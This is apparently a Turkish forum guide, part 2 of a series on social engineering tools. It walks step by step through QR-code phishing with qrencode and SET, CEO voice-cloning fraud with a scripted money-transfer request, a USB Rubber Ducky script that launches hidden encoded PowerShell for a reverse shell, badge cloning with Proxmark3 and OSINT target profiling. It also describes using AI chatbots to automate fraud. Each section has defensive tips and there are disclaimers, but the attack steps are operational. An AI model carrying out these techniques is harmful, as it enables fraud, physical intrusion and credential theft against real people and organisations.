🎭 Sosyal Mühendislik Araçlar & Rehber | Part #2 🎯

🎭 SOSYAL MÜHENDİSLİK ARAÇLARI REHBERİ – PART 2: QR KOD, DEEPFAKE, FİZİKSEL SALDIRILAR VE İLERİ TEKNİKLER​

Bu rehber, part 1'de anlatılan SET, Gophish, Evilginx2, smishing ve vishing araçlarının devamı niteliğindedir. Yeni nesil sosyal mühendislik saldırılarını, fiziksel vektörleri ve yapay zeka destekli teknikleri adım adım, gerçek simülasyon çıktılarıyla anlatacağım. Yalnızca kendi laboratuvar ortamınızda veya yazılı izniniz olan sistemlerde deneyin. Yetkisiz kullanım yasa dışıdır ve ağır yaptırımları vardır.

🧠 GİRİŞ: PART 2'DE NELER VAR?​

Part 1'de e-posta, SMS ve telefon tabanlı saldırıları işlemiştik. Bu bölümde, daha az bilinen ancak son yıllarda hızla yayılan sosyal mühendislik vektörlerini ele alacağız:

• 📱 QR kod saldırıları (QRishing)
• 🎥 Deepfake video ve ses ile kimlik bürünme
• 💳 Fiziksel sosyal mühendislik (USB dropper, badge cloning, tailgating)
• 🧑‍💻 LinkedIn ve işe alım dolandırıcılığı
• 🤖 AI chat bot ile otomatik sosyal mühendislik
• 🧪 Gelişmiş OSINT ile hedef profilleme

📱 1. QR KOD SALDIRILARI (QRISHING)​

QR kodlar, günlük hayatın her alanına girmiş durumda. Menüler, otopark ücretleri, hızlı girişler… Saldırganlar, sahte QR kodları gerçeklerinin üzerine yapıştırarak veya e-posta/SMS ile göndererek hedefi zararlı sitelere yönlendirir.

1.1. QR Code Generator ile Sahte QR Kod Oluşturma​

Araç: qrencode (Linux) veya ücretsiz online QR üreticileri.

bash
# QR kod ile yönlendirilecek phishing URL'ini oluştur
qrencode -o fake_qr.png "https://phishing-bank.com/login"
Simüle edilmiş çıktı: fake_qr.png dosyası oluşur.

Saldırı Senaryosu:

• Saldırgan, bir restoran menüsündeki gerçek QR kodu kendi sahte QR koduyla kaplar.
• Müşteri QR kodu okutur, sahte banka sayfasına yönlendirilir.
• Kimlik bilgilerini girdiğinde, saldırganın sunucusuna düşer.

1.2. QRishing ile Kimlik Bilgisi Toplama (SET ile Entegre)​

SET'in QRCode Generator Attack Vector modülü ile doğrudan phishing sayfasına yönlendiren QR kod üretebilirsiniz.

bash
sudo setoolkit
> 1) Social-Engineering Attacks
> 8) QRCode Generator Attack Vector
Simüle edilmiş çıktı:

text
[+] QR Code oluşturuldu: /root/.set/qr_attack.png
[+] Phishing sunucusu http://192.168.1.100:80 adresinde başlatıldı.
[+] QR kod okutulduğunda hedef sahte login sayfasına yönlendirilecek.
Korunma:

• QR kod okutulduktan sonra açılan URL'yi kontrol edin.
• Fiziksel QR kodların üzerinde herhangi bir etiket olup olmadığını inceleyin.
• Mobil cihazlarda güvenlik yazılımları kullanın.

🎥 2. DEEPFAKE VİDEO VE SES İLE KİMLİK BÜRÜNME​

Deepfake teknolojisi, artık sadece eğlence amaçlı değil, siber saldırılarda da kullanılıyor. Özellikle üst düzey yöneticilerin (CEO, CFO) ses ve görüntüleri taklit edilerek çalışanlara para transferi talimatı verilebiliyor.

2.1. Ses Klonlama (Voice Cloning)​

Araç: Real-Time Voice Cloning (GitHub), ElevenLabs, Resemble.ai

Adım 1: Hedefin konuşma kaydını (örneğin YouTube röportajı, şirket videosu) 30 saniyelik bir örnek olarak alın.

Adım 2: ElevenLabs web arayüzünde "Instant Voice Cloning" özelliğini kullanın.

text
[+] Ses örneği yüklendi. Klonlama başarılı.
[+] Metin gir: "Merhaba Ali, acil bir durum var. Hemen 50.000 TL'yi şu IBAN'a gönder."
[+] Ses dosyası oluşturuldu: fake_ceo.mp3
Simüle edilmiş çıktı (saldırganın bilgisayarında):

text
[+] Ses kopyalandı. Hedefi aramak için hazır.

2.2. Deepfake Video ile Kimlik Avı​

Araç: DeepFaceLab, FaceSwap, Roop

Saldırgan, hedefin yöneticisinin bir videosunu alıp, başka bir konuşma videosunun yüzünü değiştirerek sahte bir talimat videosu oluşturabilir. Bu videoyu toplantı platformu üzerinden çalışana izletebilir.

Korunma:

• İşlemler için çift kanallı onay (telefon araması + e-posta) talep edin.
• Deepfake tespit araçları kullanın (Microsoft Video Authenticator).
• Kritik işlemler için önceden belirlenmiş kod kelimeleri kullanın.

💳 3. FİZİKSEL SOSYAL MÜHENDİSLİK​

Fiziksel dünyada yapılan sosyal mühendislik, genellikle yazılım güvenliğinden daha zayıftır.

3.1. USB Dropper (Rubber Ducky)​

Araç: USB Rubber Ducky (donanım) veya Arduino Pro Micro ile yazılım taklidi.

Adım 1: Bir Rubber Ducky cihazına aşağıdaki gibi bir payload yükleyin:

bash
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0...
ENTER
Bu payload, hedef bilgisayara reverse shell çalıştırabilir.

Adım 2: USB’yi kurbanın ofisinin otoparkına veya resepsiyon masasına atın. Üzerine "Maaş Bordrosu" gibi bir etiket yapıştırın.

Simüle edilmiş çıktı (saldırgan sunucusunda):

text
[+] USB takıldı. Payload çalıştı.
[+] Meterpreter session opened.

3.2. Badge Cloning (Kart Geçiş Sistemi Kopyalama)​

Araç: Proxmark3, Flipper Zero

Saldırgan, bir çalışanın kartını kopyalayarak ofise fiziksel erişim sağlayabilir.

bash
# Proxmark3 ile kart okuma
lf search
lf hid read
Simüle edilmiş çıktı:

text
[+] HID card found. Facility Code: 123, Card Number: 4567
[+] Cloning to blank card...
[+] Clone successful.

3.3. Tailgating (Peşinden Girme)​

Saldırgan, bir çalışanın arkasından kapıyı tutarak içeri girer. Bu, en düşük teknolojili ancak en etkili yöntemlerden biridir.

Korunma:

• USB kullanım politikaları oluşturun.
• Kimlik kartları düzenli değiştirilmeli.
• Çalışanlara "tanımadığın kişiyi içeri alma" eğitimi verin.
• Güvenlik kameraları ve turnikeler kullanın.

🧑‍💻 4. LINKEDIN VE İŞE ALIM DOLANDIRICILIĞI​

Saldırganlar, sahte iş ilanları veya işe alım uzmanı profilleri oluşturarak hedeflerden özgeçmiş (ve dolayısıyla kişisel bilgiler) toplar. Hatta sahte mülakat ayarlayarak ekran paylaşımı yoluyla bilgisayara malware bulaştırabilir.

4.1. Sahte İş İlanı ile Veri Toplama​

• Saldırgan, LinkedIn'de tanınmış bir şirketin logosunu kullanarak sahte bir şirket sayfası açar.
• "Remote Data Entry", "IT Support" gibi popüler pozisyonlar için ilan verir.
• Başvuran adaylardan CV, adres, telefon ve hatta kimlik fotokopisi istenir.

4.2. Mülakat Odası Tuzağı (Sahte Zoom/TeamLink)​

Saldırgan, adayı sahte bir mülakat platformuna yönlendirir. "Ekran paylaşımı yapmanız gerekiyor" diyerek adayın bilgisayarına malware bulaştırabilir.

Korunma:

• İş başvurularında mutlaka şirketin resmi web sitesini kontrol edin.
• Mülakat linkini paylaşmadan önce domain adresini inceleyin.
• Gereksiz yere özel bilgilerinizi paylaşmayın.

🤖 5. AI CHAT BOT İLE OTOMATİK SOSYAL MÜHENDİSLİK​

Günümüzde saldırganlar, AI tabanlı chat bot'ları kullanarak binlerce kişiye aynı anda mesaj atıp otomatik olarak bilgi toplayabilir.

Araç: AutoGPT, AgentGPT, Custom GPT (kötü niyetli eğitim ile)

Adım 1: Saldırgan, bir AI bot'u "Ben Banka müşteri temsilcisiyim. Hesabınızda şüpheli hareket var. Bilgilerinizi doğrulayın." gibi bir senaryoyla eğitir.

Adım 2: Bot, saniyeler içinde yüzlerce hedefi arar ve konuşmayı yönetir.

Simüle edilmiş çıktı (bot sunucusu):

text
[+] 1234 mesaj gönderildi.
[+] 56 kişi yanıt verdi.
[+] 12 kişi kredi kartı bilgilerini paylaştı.
Korunma:

• Bankalar asla sizden şifre istemez.
• Gelen mesajlarda aceleci davranmayın.
• Bilgi vermeden önce resmi kanalları arayarak teyit edin.

🔍 6. GELİŞMİŞ OSINT İLE HEDEF PROFİLLEME​

Sosyal mühendislik saldırılarının başarısı, hedef hakkında ne kadar bilgi sahibi olduğunuza bağlıdır. OSINT araçlarıyla hedefinizin sosyal medya hesapları, iş yeri, hobileri, arkadaşları ve alışkanlıkları hakkında detaylı bilgi toplayabilirsiniz.

Araçlar: Maltego, theHarvester, Sherlock, PhoneInfoga

bash
# Kullanıcı adının hangi platformlarda olduğunu bul
sherlock hedef_kullanici_adi

# E-posta adresinden bilgi topla
theHarvester -d hedef.com -b google,linkedin,twitter
Simüle edilmiş çıktı:

text
[+] Email: [email protected]
[+] LinkedIn: https://linkedin.com/in/ali
[+] Twitter: @ali_hedef
[+] GitHub: ali_dev
[+] Şirket: XYZ Teknoloji
[+] Hobiler: yüzme, satranç
Bu bilgilerle, hedefe özel spear-phishing e-postası hazırlamak çok daha etkili olur.

🧩 ÖZET – PART 2'DEKİ YENİ TEKNİKLER​

Teknik	Açıklama	Araçlar
QRishing	Sahte QR kod ile phishing	qrencode, SET
Voice Cloning	CEO sesi taklidi	ElevenLabs, Real-Time Voice Cloning
Deepfake Video	Yüz değiştirme ile sahte talimat	DeepFaceLab, Roop
USB Dropper	Zararlı USB bırakma	Rubber Ducky, Arduino
Badge Cloning	Kart geçiş sistemi kopyalama	Proxmark3, Flipper Zero
Tailgating	Fiziksel peşinden girme	(donanım yok)
LinkedIn Dolandırıcılığı	Sahte iş ilanı	LinkedIn, sahte web sitesi
AI Chat Bot	Otomatik sosyal mühendislik	AutoGPT, AgentGPT
Gelişmiş OSINT	Hedef profilleme	Maltego, Sherlock, theHarvester

​

🛡️ GENEL KORUNMA ÖNERİLERİ (PART 1+2)​

• Her zaman doğrulama: Gelen her talimatı farklı bir kanaldan teyit edin (telefon + e-posta).
• Güvenlik farkındalık eğitimleri: Çalışanlara düzenli olarak simüle saldırılar yapın.
• Fiziksel güvenlik: Ofise giriş çıkışları kontrol altında tutun, kimlik kartlarını düzenli değiştirin.
• Teknolojik önlemler: E-posta filtreleri, DMARC, DKIM, SPF, MFA (tercihen FIDO2/WebAuthn).
• Zero Trust prensibi: Hiç kimseye varsayılan olarak güvenme, her işlem için yetkilendirme iste.

​

🔚;​

Artık sosyal mühendisliğin sadece e-posta veya telefonla sınırlı olmadığını, QR kod, deepfake, fiziksel cihazlar, sahte iş ilanları ve yapay zeka botları gibi birçok farklı vektörü olduğunu biliyorsunuz. Bu bilgileri yalnızca eğitim ve yetkili güvenlik testlerinde kullanın. Unutmayın: Savunması olmayanın saldırısı, sadece intihardır. Kendinizi ve çevrenizdekileri bu tehditlere karşı korumak sizin elinizde.

---

Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz kullanım yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.

@Tc4dy | github.com/tc4dy